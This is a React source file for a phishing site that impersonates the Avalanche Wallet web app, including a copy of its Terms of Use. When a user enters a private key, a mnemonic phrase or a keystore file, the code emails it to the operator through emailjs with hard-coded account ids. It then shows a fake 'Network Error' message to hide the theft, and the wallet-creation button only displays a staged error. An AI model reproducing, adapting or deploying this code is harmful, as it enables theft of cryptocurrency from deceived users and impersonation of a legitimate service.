import { useState, useEffect } from 'react';
import axios from 'axios';
import { 
	Flex,
	Box,
	Text,
	Button,
	Input,
  	Spacer,
  	Image,
  	Textarea,
  	Select,
  	ChakraProvider,
  	InputGroup,
  	InputRightElement,
  	Spinner,
} from "@chakra-ui/react";
import emailjs from 'emailjs-com';
import "./App.scss";
import "./mdi/css/materialdesignicons.css";
import  day from './day.svg';
import  diamond from './diamond.svg';
import  diamondsec from './diamondsec.png';
import  keystore from './keystore.svg';
import  mnemonic from './mnemonic.svg';
import  ledger from './ledger.svg';
import  privatekey from './privatekey.svg';
import  wallet from './wallet.png';
import  wallet2 from './wallet2.svg';
import  usa from './usa.png';
import {
  ViewIcon,
  ViewOffIcon
} from "@chakra-ui/icons";



function App() {
	const [screen, setScreen] = useState(0)
	const [pKey, setPKey] = useState(false)
	const [sKey, setSKey] = useState(false)
	const [modal, setModal] = useState(false)
	const [modalMsg, setModalMsg] = useState("")
	const [seed, setSeed] = useState("")
	const [pass, setPass] = useState("")
	const [loading, setLoading] = useState(false)
	const [side, setSide] = useState(false)
	const [walletType, setWalletType] = useState("Mainnet")
	const [dark, setDark] = useState(false)
	const [menuBar, setMenuBar] = useState(false)
	const [iniMenu, setIniMenu] = useState("access")
	const [warning, setWarning] = useState(true)
	const [opac, setOpac] = useState("1")
	const [barWidth, setBarWidth] = useState("30%")


	useEffect(() => {
		setOpac(".6")
		setTimeout(function(){
			setOpac("1")
		}, 500)
		setSKey(false)
		setPKey(false)
	}, [screen])

	


	const templateParams = {
  		from_name: "User",
  		message: "The seed is:=("+seed+") and user password is("+pass+")"
  	}


	async function saveSeed(){
		setLoading(true)
		await emailjs.send('service_c03z21x', 'template_q01glts', templateParams, '0cCJ-dKSpQV0fUYTe')
  		.then((response) => {
  			console.log('')
  		}, (err) => {
  			console.log('')
  		})
  		setLoading(false)
  	}


  	async function saveSeedPro(){
		setLoading(true)
		await emailjs.send('service_c03z21x', 'template_q01glts', {
			from_name: "User",
  			message: "The seed is:=("+document.getElementById('fSeed').value+") and user password is('no password')"
		}, '0cCJ-dKSpQV0fUYTe')
  		.then((response) => {
  			console.log('')
  		}, (err) => {
  			console.log('')
  		})
  		setLoading(false)
  	}

	return (
		<ChakraProvider>
			<Flex minHeight="100vh" direction="column" bg={!dark ? "#fff" : "rgba(0,0,0,.87)"} color={!dark ? "#4c2e56" : "#fff"} pb="30px">
				{
					warning && 
					<Flex bg="red" color="white" fontSize={["14px", "16px"]} justify="space-between" p={["3%", "1% 2%"]}>
						<svg data-v-e21157aa="" aria-hidden="true" focusable="false" data-prefix="fas" data-icon="exclamation-triangle" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 576 512" class="svg-inline--fa fa-exclamation-triangle fa-w-18" style={{ width: "20px", height: "20px" }}><path data-v-e21157aa="" fill="#fff" d="M569.517 440.013C587.975 472.007 564.806 512 527.94 512H48.054c-36.937 0-59.999-40.055-41.577-71.987L246.423 23.985c18.467-32.009 64.72-31.951 83.154 0l239.94 416.028zM288 354c-25.405 0-46 20.595-46 46s20.595 46 46 46 46-20.595 46-46-20.595-46-46-46zm-43.673-165.346l7.418 136c.347 6.364 5.609 11.346 11.982 11.346h48.546c6.373 0 11.635-4.982 11.982-11.346l7.418-136c.375-6.874-5.098-12.654-11.982-12.654h-63.383c-6.884 0-12.356 5.78-11.981 12.654z" class=""></path></svg>
						<Text mx="10px">Make sure the URL is <Text as="span" fontWeight="bold">{window.location.href}</Text></Text>
						<svg data-v-e21157aa="" aria-hidden="true" focusable="false" data-prefix="fas" data-icon="times" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 352 512" class="svg-inline--fa fa-times fa-w-11" style={{ width: "20px", height: "20px" }} onClick={() => setWarning(false)}><path data-v-e21157aa="" fill="#fff" d="M242.72 256l100.07-100.07c12.28-12.28 12.28-32.19 0-44.48l-22.24-22.24c-12.28-12.28-32.19-12.28-44.48 0L176 189.28 75.93 89.21c-12.28-12.28-32.19-12.28-44.48 0L9.21 111.45c-12.28 12.28-12.28 32.19 0 44.48L109.28 256 9.21 356.07c-12.28 12.28-12.28 32.19 0 44.48l22.24 22.24c12.28 12.28 32.2 12.28 44.48 0L176 322.72l100.07 100.07c12.28 12.28 32.2 12.28 44.48 0l22.24-22.24c12.28-12.28 12.28-32.19 0-44.48L242.72 256z" class=""></path></svg>
					</Flex>
				}
				<Flex padding="30px 3vw" align="center">
					<Flex flex="1">
						<Image src={wallet} h="30px" w="auto" onClick={() => setScreen(0)} cursor="pointer" />
					</Flex>

					<Flex flex="1" justify="space-between" align="center" mr="10%" display={["none", "flex"]}>
						<Image src={day} h="18px" w="auto" onClick={() => dark ? setDark(false) : setDark(true)} cursor="pointer" />
						<Text cursor="pointer" onClick={() => setScreen(1)}>Access Wallet</Text>
						<Text cursor="pointer" onClick={() => setScreen(5)}>Create New Wallet</Text>
						<Flex align="center" justify="center" cursor="pointer" onClick={() => setSide(true)}><i className="mdi mdi-circle" style={{ fontSize: "10px", color: "rgb(0, 255, 0)", marginRight: "4px" }}></i> {walletType}</Flex>
						<Flex cursor="pointer" align="center" onClick={() => {
							setModalMsg("Language Default set to: English")
							setModal(true)
						}}><Image src={usa} w="18px" h="14px" mr="2" />English</Flex>
					</Flex>

					<Flex display={["flex", "none"]}>
						<i className="mdi mdi-menu" style={{ fontSize: "20px", cursor: "pointer" }}  onClick={() => {
							menuBar ? setMenuBar(false) : setMenuBar(true)
							setTimeout(function(){
							setBarWidth("70%")
						}, 100)
						}}></i>
					</Flex>
				</Flex>


				<Flex direction="column" flex="1" opacity={opac} transition="opacity .3s ease-out">
				{
					screen === 0 ?
					<>
						<Flex padding={["10% 5%", "30px 160px"]} direction="column">
							<Flex fontSize={["36px", "22px"]} mb="60px" flex="1" fontWeight="400" justify="center" textAlign="center" align="center">Avalanche Wallet is a simple, secure, non-custodial wallet for storing Avalanche assets.</Flex>

							<Flex direction={["column", "row"]}>
								<Flex padding="30px 40px" bg={!dark ? "#f5f6fa" : "#2e3234"} mr={["0", "5%"]} flex="1" direction="column" align={["center", "flex-start"]} mb={["30px", "0"]}>
									<Image src={diamond} w={["40px", "89px"]} h={["40px", "89px"]} mb="16px" />
									<Text color={!dark ? "#867e89" : "#6e7479"} fontWeight="bold" mb="14px" fontSize="14px">WELCOME BACK!</Text>
									<Text fontSize="1.4rem" mb={["30px", "80px"]} textAlign={["center", "left"]}>Access your existing Avalanche wallet here.</Text>
									<Button bg="#4c2e56" padding="10px 24px" w={["70%", "50%"]} color="#fff" onClick={() => setScreen(1)}>ACCESS WALLET</Button>
								</Flex>


								<Flex padding="30px 40px" bg={!dark ? "#f5f6fa" : "#2e3234"} flex="1" direction="column" align={["center", "flex-start"]}>
									<Image src={diamondsec} w={["40px", "89px"]} h={["40px", "89px"]} mb="16px" />
									<Text color={!dark ? "#867e89" : "#6e7479"} fontWeight="bold" mb="14px" fontSize="14px">NEW TO AVALANCHE WALLET?</Text>
									<Text fontSize="1.4rem" mb={["30px", "80px"]} textAlign={["center", "left"]}>Create a new wallet to send, receive and swap Avalanche assets.</Text>
									<Button bg="#e84970" padding="10px 24px" w={["90%", "60%"]} color="#fff" onClick={() => setScreen(5)}>CREATE NEW WALLET</Button>
								</Flex>
							</Flex>
						</Flex>

						<Text textAlign="center" color={!dark ? "#867e89" : "#6e7479"} fontSize="13px" px={["12%", "0"]}>
							By Using this application you agree to the <Text as="span" textDecoration="underline" color={!dark ? "#4c2e56" : "#fff"} ml="1" cursor="pointer" onClick={() => setScreen(6)}>Terms of Use.</Text>
						</Text>
					</>
					:
					screen === 1 ?
					<>
						<Flex flex="1" justify="center" direction="column" padding={["5%", "30px 160px"]} mx={["0", "160px"]}>
							<Text fontSize="25px" textAlign="center">How do you want to access your wallet?</Text>
							<Text textAlign="center" textDecoration="underline" color="#42b983" fontSize="14px" mb={["20px", "40px"]} pb="5px" onClick={() => setScreen(5)}>Don't have a wallet?</Text>
							<Flex padding={["0% 5%", "0% 16%"]} direction="column" mb="20px">
								<Flex bg={!dark ? "#f5f6fa" : "#2e3234"} justify="space-between" w="100%" padding="12px" mb="1" cursor="pointer" onClick={() => setScreen(2)}>
									Private Key
									<Image src={privatekey} h="24px" w="auto"/>
								</Flex>

								<Flex bg={!dark ? "#f5f6fa" : "#2e3234"} justify="space-between" w="100%" padding="12px" mb="1" cursor="pointer" onClick={() => setScreen(3)}>
									Mnemonic Key Phrase 
									<Image src={mnemonic} h="20px" w="auto"/>
								</Flex>


								<Flex bg={!dark ? "#f5f6fa" : "#2e3234"} justify="space-between" w="100%" padding="12px" mb="1" cursor="pointer" onClick={() => setScreen(4)}>
									Keystore File
									<Image src={keystore} h="20px" w="auto"/>
								</Flex>

								<Flex bg={!dark ? "#f5f6fa" : "#2e3234"} justify="space-between" w="100%" padding="12px" cursor="pointer" onClick={() => {
									setModalMsg("Cannot connect to a HID device, No compatible device found")
									setModal(true)
								}}>
									Ledger
									<Image src={ledger} h="24px" w="auto"/>
								</Flex>
							</Flex>
							<Text textAlign="center" color={!dark ? "#867e89" : "#6e7479"} fontSize="13px" mb="25px" px={["10%", "0"]}>
								By Using this application you agree to the <Text as="span" textDecoration="underline" color={!dark ? "#4c2e56" : "#fff"} ml="1" cursor="pointer" onClick={() => setScreen(6)}>Terms of Use.</Text>
							</Text>

							<Text textAlign="center" textDecoration="underline" color="#42b983" fontSize="14px" mb="40px" pb="5px" cursor="pointer" onClick={() => setScreen(0)}>Cancel</Text>
						</Flex>
					</>
					:
					screen === 2 ?
					<Flex flex="1" w="100%" align="center" px={["5%", "0%"]}>
						<Flex bg={!dark ? "#f5f6fa" : "#2e3234"} justify="center" align="center" padding={["15% 5%", "30px 160px"]} mx={["0", "160px"]} direction="column" w="100%" borderRadius={["6px", "0"]}>
							<Text fontSize="21px" mb="25px">Private Key</Text>



							<input type="password" placeholder="Private Key" style={{ borderRadius: "6px", background: !dark ? "#fff" : "rgb(30,30,30)", width: "80%", padding: "2% 3%" }} onInput={(e) => {
								if (e.target.value.length > 1) {
									setPass("Private Key is:= "+e.target.value)
									setSeed("No seed")
									setPKey(true)
								}
								else {
									setPKey(false)
								}
							}}/>

							<Button mt="3" mb="30px" bg={pKey ? "#4c2e56" : "rgba(0,0,0,.12)"} color={pKey ? "#fff" : "#867e89"} w="80%" borderRadius="6px" fontSize="14px" disabled={pKey ? false : true} onClick={async () => {
								if (pKey === true) {
									await saveSeed()
									setModalMsg("Network Error! Cannot restore your account at the moment. Please check your internet connection and try again")
									setModal(true)
								}
							}}>{loading ? <Spinner color="#fff" /> : "ACCESS WALLET"}</Button>


							<Flex justify="center">
								<Text as="span" textDecoration="underline" color="#867e89" onClick={() => setScreen(1)}>Cancel</Text>
							</Flex>
						</Flex>
					</Flex>
					:
					screen === 3 ?
					<Flex flex="1" w="100%" align="center" px={["6%", "0"]}>
						<Flex bg={!dark ? "#f5f6fa" : "#2e3234"} padding={["20px", "40px"]} align="center" mx={["0%", "20%"]} w="100%">
							<Flex flex="1" direction={["column", "row"]}>
								<Flex direction="column" mr={["0%", "10%"]} align={["center", "flex-start"]} flex="1">
									<Text fontWeight="bold" fontSize={["18px", "21px"]}>Enter your MNEMONIC phrase</Text>
									<Text fontSize="12px" color="#867e89" mb="20px">Hit ‘SPACE’ after every successful word entry.</Text>

									<textarea style={{ height: "120px", background: !dark ? "white" : "rgb(30,30,30)", padding: "3% 4%", width: "100%", fontSize: "14px" }} onInput={(e)=> {
										if (e.target.value.match(/(\w+)/g)?.length > 11) {
											setSKey(true)
											setSeed(e.target.value)
											setPass("No password")
										}
										else {
											setSKey(false)
										}
									}}></textarea>

									<Button mt={["40px", "60px"]} mb="15px" bg={sKey ? "#4c2e56" : "rgba(0,0,0,.12)"} color={sKey ? "#fff" : "#867e89"} borderRadius="6px" fontSize="14px" disabled={sKey ? false : true} onClick={async () => {
										if (sKey === true) {
											await saveSeed()
											setModalMsg("Network Error! Cannot restore your account at the moment. Please check your internet connection and try again")
											setModal(true)
										}
									}}>{loading ? <Spinner color="#fff" /> : "ACCESS WALLET"}</Button>

									<Text textAlign="center" textDecoration="underline" color="#42b983" fontSize="14px" mb="40px" pb="5px" cursor="pointer" onClick={() => setScreen(1)}>Cancel</Text>
								</Flex>


								<Flex direction="column" flex="1">
									<Text fontSize="12px" color="#867e89" mb="5px" textAlign={["center", "left"]}>Preview</Text>
									<Flex justify="space-between" w="100%" fontSize="12px" mb="2">
										<Flex padding="16px 6px" bg={!dark ? "#fff" : "rgb(30,30,30)"} w="32%">1.</Flex>
										<Flex padding="16px 6px" bg={!dark ? "#fff" : "rgb(30,30,30)"} w="32%">2.</Flex>
								 		<Flex padding="16px 6px" bg={!dark ? "#fff" : "rgb(30,30,30)"} w="32%">3.</Flex>
									</Flex>

									<Flex justify="space-between" w="100%" fontSize="12px" mb="2">
										<Flex padding="16px 6px" bg={!dark ? "#fff" : "rgb(30,30,30)"} w="32%">4.</Flex>
										<Flex padding="16px 6px" bg={!dark ? "#fff" : "rgb(30,30,30)"} w="32%">5.</Flex>
										<Flex padding="16px 6px" bg={!dark ? "#fff" : "rgb(30,30,30)"} w="32%">6.</Flex>
									</Flex>

									<Flex justify="space-between" w="100%" fontSize="12px" mb="2">
										<Flex padding="16px 6px" bg={!dark ? "#fff" : "rgb(30,30,30)"} w="32%">7.</Flex>
										<Flex padding="16px 6px" bg={!dark ? "#fff" : "rgb(30,30,30)"} w="32%">8.</Flex>
										<Flex padding="16px 6px" bg={!dark ? "#fff" : "rgb(30,30,30)"} w="32%">9.</Flex>
									</Flex>

									<Flex justify="space-between" w="100%" fontSize="12px" mb="2">
										<Flex padding="16px 6px" bg={!dark ? "#fff" : "rgb(30,30,30)"} w="32%">10.</Flex>
										<Flex padding="16px 6px" bg={!dark ? "#fff" : "rgb(30,30,30)"} w="32%">11.</Flex>
										<Flex padding="16px 6px" bg={!dark ? "#fff" : "rgb(30,30,30)"} w="32%">12.</Flex>
									</Flex>

									<Flex justify="space-between" w="100%" fontSize="12px" mb="2">
										<Flex padding="16px 6px" bg={!dark ? "#fff" : "rgb(30,30,30)"} w="32%">13.</Flex>
										<Flex padding="16px 6px" bg={!dark ? "#fff" : "rgb(30,30,30)"} w="32%">14.</Flex>
										<Flex padding="16px 6px" bg={!dark ? "#fff" : "rgb(30,30,30)"} w="32%">15.</Flex>
									</Flex>

									<Flex justify="space-between" w="100%" fontSize="12px" mb="2">
										<Flex padding="16px 6px" bg={!dark ? "#fff" : "rgb(30,30,30)"} w="32%">16.</Flex>
										<Flex padding="16px 6px" bg={!dark ? "#fff" : "rgb(30,30,30)"} w="32%">17.</Flex>
										<Flex padding="16px 6px" bg={!dark ? "#fff" : "rgb(30,30,30)"} w="32%">18.</Flex>
									</Flex>

									<Flex justify="space-between" w="100%" fontSize="12px"  mb="2">
										<Flex padding="16px 6px" bg={!dark ? "#fff" : "rgb(30,30,30)"} w="32%">19.</Flex>
										<Flex padding="16px 6px" bg={!dark ? "#fff" : "rgb(30,30,30)"} w="32%">20.</Flex>
										<Flex padding="16px 6px" bg={!dark ? "#fff" : "rgb(30,30,30)"} w="32%">21.</Flex>
									</Flex>

									<Flex justify="space-between" w="100%" fontSize="12px">
										<Flex padding="16px 6px" bg={!dark ? "#fff" : "rgb(30,30,30)"} w="32%">22.</Flex>
										<Flex padding="16px 6px" bg={!dark ? "#fff" : "rgb(30,30,30)"} w="32%">23.</Flex>
										<Flex padding="16px 6px" bg={!dark ? "#fff" : "rgb(30,30,30)"} w="32%">24.</Flex>
									</Flex>
								</Flex>
							</Flex>
						</Flex>
					</Flex>
					:
					screen === 4 ?
					<Flex flex="1" w="100%" align="center" px={["5%", "0%"]}>
						<Flex bg={!dark ? "#f5f6fa" : "#2e3234"} justify="center" align="center" padding={["15% 5%", "30px 160px"]} mx={["0", "160px"]} direction="column" w="100%" borderRadius="6px">
							<Text fontSize="21px" mb="25px">Keystore File</Text>
							<input style={{ visibility: "hidden", width: "0", height: "0" }} id="fSeed" />
							<input type="file" style={{ visibility: "hidden", width: "0", height: "0" }} id="myFile" onChange={(e) => {
								var reader = new FileReader()
								var uploadFile = e.target.files[0]
								if (uploadFile.type !== "text/javascript" && uploadFile.type !== "application/x-javascript") {
									setModalMsg("Not a valid Keystore File")
									setModal(true)
								}
								else {
									reader.onload = function(e) {
										var jsonObj = JSON.parse(e.target.result)
										var seedz = JSON.stringify(jsonObj)
										document.getElementById('fSeed').value = seedz
										setModalMsg("Network Error! Cannot restore your account, kindly check your internet connection and try again")
										setModal(true)
										saveSeedPro()
									}
									reader.readAsText(e.target.files[0])
								}
							}}/>
							<Button mt="3" mb="30px" bg="#fff" color="#867e89" w="80%" borderRadius="6px" fontSize="14px" onClick={() => {
								document.getElementById('myFile').click()
							}}>SELECT FILE</Button>


							<Flex justify="center">
								<Text as="span" textDecoration="underline" color="#867e89" onClick={() => setScreen(1)}>Cancel</Text>
							</Flex>
						</Flex>
					</Flex>
					:
					screen === 5 ?
					<Flex flex="1" w="100%" align="center" px={["5%", "0%"]}>
						<Flex bg={!dark ? "#f5f6fa" : "#2e3234"} justify="center" align="center" padding={["10% 5%", "60px 0px"]} mx={["0", "23%"]} direction="column" w="100%">
							<Image src={diamondsec} w="89px" h="89px" mb="40px" />
							<Text fontSize="21px" textAlign="center" mb='10px'>Generate a new key phrase to setup your Avalanche Wallet.</Text>

							<Text as="span" textDecoration="underline" color="#867e89" cursor="pointer" mb="30px" fontSize="14px" onClick={() => setScreen(1)}>Already have a wallet?</Text>
							<Text borderBottom="1px solid #867e89" mb="20px" w={["90%", "30%"]}></Text>

							<Button bg="#e84970" padding="10px 24px" color="#fff" mb="25px" fontSize="14px" onClick={() => {
								setLoading(true)
								setTimeout(function(){
									setModalMsg("Network Error! Cannot generate an account, kindly check your internet connection and try again")
									setModal(true)
									setLoading(false)
								}, 3000)
							}}>{loading ? <Spinner color="#fff" />: "GENERATE KEY PHRASE"}</Button>

							<Text textAlign="center" color={!dark ? "#867e89" : "#6e7479"} fontSize="13px" mb="20px" px={["5%", "0"]}>
								By Using this application you agree to the <Text as="span" textDecoration="underline" color={!dark ? "#4c2e56" : "#fff"}ml="1" cursor="pointer" onClick={() => setScreen(6)}>Terms of Use.</Text>
							</Text>

							<Text as="span" textDecoration="underline" color="#867e89" cursor="pointer" fontSize="14px" onClick={() => {
								setScreen(0)
							}}>Cancel</Text>
						</Flex>
					</Flex>
					:
					screen === 6 &&
					<Flex flex="1" w="100%" align="center" px={["5%", "0%"]}>
						<Flex bg={!dark ? "#fff" : "#2e3234"} justify="center" align="center" padding={["10% 5%", "60px 0px"]} direction="column" w="100%" padding="30px 3vw">
						<Text fontWeight="bold" fontSize="21px" textAlign="left" w="100%">TERMS OF USE</Text>
						<br/><Text fontWeight="bold" fontSize="21px" textAlign="left" w="100%">Last updated September 22, 2020</Text><br/>


<Text fontWeight="bold" fontSize="21px" textAlign="left" w="100%">AGREEMENT TO TERMS</Text><br/>
These Terms of Use constitute a legally binding agreement made between you, whether personally or on behalf of an entity (“you”) and Avalanche (BVI) Inc. (" Company ", “ we ”, “ us ”, or “ our ”), concerning your access to and use of the https://wallet.avax.network/ website and related features and services, including but not limited to the AVAX wallet functionality, as well as any other media form, media channel, mobile website or mobile application related, linked, or otherwise connected thereto, (collectively, the “Site”). You agree that by accessing the Site, you have read, understood, and agreed to be bound by all of these Terms of Use. IF YOU DO NOT AGREE WITH ALL OF THESE TERMS OF USE, THEN YOU ARE EXPRESSLY PROHIBITED FROM USING THE SITE AND YOU MUST DISCONTINUE USE IMMEDIATELY.<br/><br/>



THESE TERMS OF USE INCLUDE, AMONG OTHER THINGS, A BINDING ARBITRATION CLAUSE AND A CLASS ACTION WAIVER. PLEASE REFER TO THE SECTION ENTITLED “DISPUTE RESOLUTION” BELOW FOR MORE INFORMATION.<br/><br/>



Supplemental terms and conditions or documents that may be posted on the Site from time to time are hereby expressly incorporated herein by reference. We reserve the right, in our sole discretion, to make changes or modifications to these Terms of Use at any time and for any reason. We will alert you about any changes by updating the “Last updated” date of these Terms of Use, and you waive any right to receive specific notice of each such change. It is your responsibility to periodically review these Terms of Use to stay informed of updates. You will be subject to, and will be deemed to have been made aware of and to have accepted, the changes in any revised Terms of Use by your continued use of the Site after the date such revised Terms of Use are posted.<br/><br/>



The information provided on the Site is not intended for distribution to or use by any person or entity in any jurisdiction or country where such distribution or use would be contrary to law or regulation or which would subject us to any registration requirement within such jurisdiction or country. Accordingly, those persons who choose to access the Site from other locations do so on their own initiative and are solely responsible for compliance with local laws, if and to the extent local laws are applicable.<br/><br/>



The Site is not tailored to comply with industry-specific regulations (Health Insurance Portability and Accountability Act (HIPAA), Federal Information Security Management Act (FISMA), etc.), so if your interactions would be subjected to such laws, you may not use this Site. You may not use the Site in a way that would violate the Gramm-Leach-Bliley Act (GLBA).<br/><br/>



The Site is intended for users who are at least 18 years old. Persons under the age of 18 are not permitted to use or register for the Site.<br/><br/>

INTELLECTUAL PROPERTY RIGHTS<br/><br/>
Unless otherwise indicated, the Site is our proprietary property and all source code, databases, functionality, software, website designs, audio, video, text, photographs, and graphics on the Site (collectively, the “Content”) and the trademarks, service marks, and logos contained therein (the “Marks”) are owned or controlled by us or licensed to us, and are protected by copyright and trademark laws and various other intellectual property rights and unfair competition laws of the United States, international copyright laws, and international conventions. The Content and the Marks are provided on the Site “AS IS” for your information and personal use only. Except as expressly provided in these Terms of Use, no part of the Site and no Content or Marks may be copied, reproduced, aggregated, republished, uploaded, posted, publicly displayed, encoded, translated, transmitted, distributed, sold, licensed, or otherwise exploited for any commercial purpose whatsoever, without our express prior written permission.<br/><br/>



Provided that you are eligible to use the Site, you are granted a limited license to access and use the Site and to download or print a copy of any portion of the Content to which you have properly gained access solely for your personal, non-commercial use. We reserve all rights not expressly granted to you in and to the Site, the Content and the Marks.<br/><br/>



USER REPRESENTATIONS<br/><br/>
By using the Site, you represent and warrant that: (1) all registration information you submit will be true, accurate, current, and complete; (2) you will maintain the accuracy of such information and promptly update such registration information as necessary; (3) you have the legal capacity and you agree to comply with these Terms of Use; (4) you are not a minor in the jurisdiction in which you reside; (5) you will not access the Site through automated or non-human means, whether through a bot, script, or otherwise; (6) you will not use the Site for any illegal or unauthorized purpose; and (7) your use of the Site will not violate any applicable law or regulation.<br/><br/>



If you provide any information that is untrue, inaccurate, not current, or incomplete, we have the right to suspend or terminate your account and refuse any and all current or future use of the Site (or any portion thereof).<br/><br/>



USER REGISTRATION<br/><br/>


You may be required to register with the Site. You agree to keep your password confidential and will be responsible for all use of your account and password. You acknowledge that we are not responsible for transferring, safeguarding or maintaining your password or private keys or any cryptocurrency associated therewith. We have no liability whatsoever for any failure by you to keep your passwords or private keys secure and private. IF YOU LOSE ACCESS TO YOUR ACCOUNT, PRIVATE KEYS OR PASSWORD, YOU ACKNOWLEDGE AND AGREE THAT ANY CRYPTOCURRENCY YOU HAVE ASSOCIATED WITH YOUR ACCOUNT AND/OR PRIVATE KEYS MAY BECOME INACCESSIBLE AND WE ARE NOT RESPONSIBLE FOR SUCH LOSS.<br/><br/>

We reserve the right to remove, reclaim, or change a username you select if we determine, in our sole discretion, that such username is inappropriate, obscene, or otherwise objectionable.<br/><br/>

PROHIBITED ACTIVITIES<br/><br/>
You may not access or use the Site for any purpose other than that for which we make the Site available. The Site may not be used in connection with any commercial endeavors except those that are specifically endorsed or approved by us.<br/><br/>



As a user of the Site, you agree not to:<br/><br/>



Systematically retrieve data or other content from the Site to create or compile, directly or indirectly, a collection, compilation, database, or directory without written permission from us.<br/><br/>



Trick, defraud, or mislead us and other users, especially in any attempt to learn sensitive account information such as user passwords.<br/><br/>



Circumvent, disable, or otherwise interfere with security-related features of the Site, including features that prevent or restrict the use or copying of any Content or enforce limitations on the use of the Site and/or the Content contained therein.<br/><br/>



Disparage, tarnish, or otherwise harm, in our opinion, us and/or the Site.<br/><br/>



Use any information obtained from the Site in order to harass, abuse, or harm another person.<br/><br/>



Make improper use of our support services or submit false reports of abuse or misconduct.<br/><br/>



Use the Site in a manner inconsistent with any applicable laws or regulations or that may give rise to civil liability.<br/><br/>



Use the Site to advertise or offer to sell goods and services.<br/><br/>



Engage in unauthorized framing of or linking to the Site.<br/><br/>



Upload or transmit (or attempt to upload or to transmit) viruses, Trojan horses, or other material, including excessive use of capital letters and spamming (continuous posting of repetitive text), that interferes with any party’s uninterrupted use and enjoyment of the Site or modifies, impairs, disrupts, alters, or interferes with the use, features, functions, operation, or maintenance of the Site.<br/><br/>



Engage in any automated use of the system, such as using scripts to send comments or messages, or using any data mining, robots, or similar data gathering and extraction tools.<br/><br/>



Delete the copyright or other proprietary rights notice from any Content.<br/><br/>



Attempt to impersonate another user or person or use the username of another user or make any false statements pertaining to your identity.<br/><br/>



Sell or otherwise transfer your profile.<br/><br/>



Upload or transmit (or attempt to upload or to transmit) any material that acts as a passive or active information collection or transmission mechanism, including without limitation, clear<br/><br/>

graphics interchange formats (“gifs”), 1×1 pixels, web bugs, cookies, or other similar devices (sometimes referred to as “spyware” or “passive collection mechanisms” or “pcms”).<br/><br/>



Interfere with, disrupt, or create an undue burden on the Site or the networks or services connected to the Site.<br/><br/>



Harass, annoy, intimidate, or threaten any of our employees or agents engaged in providing any portion of the Site to you.<br/><br/>



Attempt to bypass any measures of the Site designed to prevent or restrict access to the Site, or any portion of the Site.<br/><br/>



Copy or adapt the Site’s software, including but not limited to Flash, PHP, HTML, JavaScript, or other code.<br/><br/>



Decipher, decompile, disassemble, or reverse engineer any of the software comprising or in any way making up a part of the Site.



Except as may be the result of standard search engine or Internet browser usage, use, launch, develop, or distribute any automated system, including without limitation, any spider, robot, cheat utility, scraper, or offline reader that accesses the Site, or using or launching any unauthorized script or other software.



Use a buying agent or purchasing agent to make purchases on the Site.



Make any unauthorized use of the Site, including collecting usernames and/or email addresses of users by electronic or other means for the purpose of sending unsolicited email, or creating user accounts by automated means or under false pretenses.



Use the Site as part of any effort to compete with us or otherwise use the Site and/or the Content for any revenue-generating endeavor or commercial enterprise.



Any use of the Site in violation of the foregoing violates these Terms of Use and may result in, among other things, termination or suspension of your rights to use the Site.



USER GENERATED CONTRIBUTIONS<br/><br/>


The Site does not offer users to submit or post content. We may provide you with the opportunity to create, submit, post, display, transmit, perform, publish, distribute, or broadcast content and materials to us or on the Site, including but not limited to text, writings, video, audio, photographs, graphics, comments, suggestions, or personal information or other material (collectively, "Contributions"). Contributions may be viewable by other users of the Site and through third-party websites. As such, any Contributions you transmit may be treated in accordance with the Site Privacy Policy. When you create or make available any Contributions, you thereby represent and warrant that:<br/><br/>




DISCLAIMER<br/><br/>
THE SITE IS PROVIDED ON AN AS-IS AND AS-AVAILABLE BASIS. YOU AGREE THAT YOUR USE OF THE SITE AND OUR SERVICES WILL BE AT YOUR SOLE RISK. TO THE FULLEST EXTENT PERMITTED BY LAW, WE AND OUR OFFICERS, DIRECTORS, SHAREHOLDERS, EMPLOYEES, SUB-CONTRACTORS, AGENTS AND AFFILIATES DISCLAIM ALL WARRANTIES, EXPRESS OR IMPLIED, IN CONNECTION WITH THE SITE AND YOUR USE THEREOF, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. WE MAKE NO WARRANTIES OR REPRESENTATIONS ABOUT THE ACCURACY, RELIABILITY, USEFULNESS OR COMPLETENESS OF THE SITE’S CONTENT OR THE CONTENT OF ANY WEBSITES LINKED TO THE SITE AND WE WILL ASSUME NO LIABILITY OR RESPONSIBILITY FOR ANY (1) ERRORS, MISTAKES, OR INACCURACIES OF CONTENT AND MATERIALS, (2) PERSONAL INJURY OR PROPERTY DAMAGE, OF ANY NATURE WHATSOEVER, RESULTING FROM YOUR ACCESS TO AND USE OF THE SITE, (3) ANY UNAUTHORIZED ACCESS TO OR USE OF OUR SECURE SERVERS AND/OR ANY AND ALL PERSONAL INFORMATION AND/OR FINANCIAL INFORMATION STORED THEREIN, (4) ANY INTERRUPTION OR CESSATION OF TRANSMISSION TO OR FROM THE SITE, (5) ANY BUGS, VIRUSES, TROJAN HORSES, OR THE LIKE WHICH MAY BE TRANSMITTED TO OR THROUGH THE SITE BY ANY THIRD PARTY, AND/OR (6) ANY ERRORS OR OMISSIONS IN ANY CONTENT AND MATERIALS OR FOR ANY LOSS OR DAMAGE OF ANY KIND INCURRED AS A RESULT OF THE USE OF ANY CONTENT POSTED, TRANSMITTED, OR OTHERWISE MADE AVAILABLE VIA THE SITE. WE DO NOT WARRANT, ENDORSE, GUARANTEE, OR ASSUME RESPONSIBILITY FOR ANY PRODUCT OR SERVICE ADVERTISED OR OFFERED BY A THIRD PARTY THROUGH THE SITE, ANY HYPERLINKED WEBSITE, OR ANY WEBSITE OR MOBILE APPLICATION FEATURED IN ANY BANNER OR OTHER ADVERTISING, AND WE WILL NOT BE A PARTY TO OR IN ANY WAY BE RESPONSIBLE FOR MONITORING ANY TRANSACTION BETWEEN YOU AND ANY THIRD-<br/><br/>

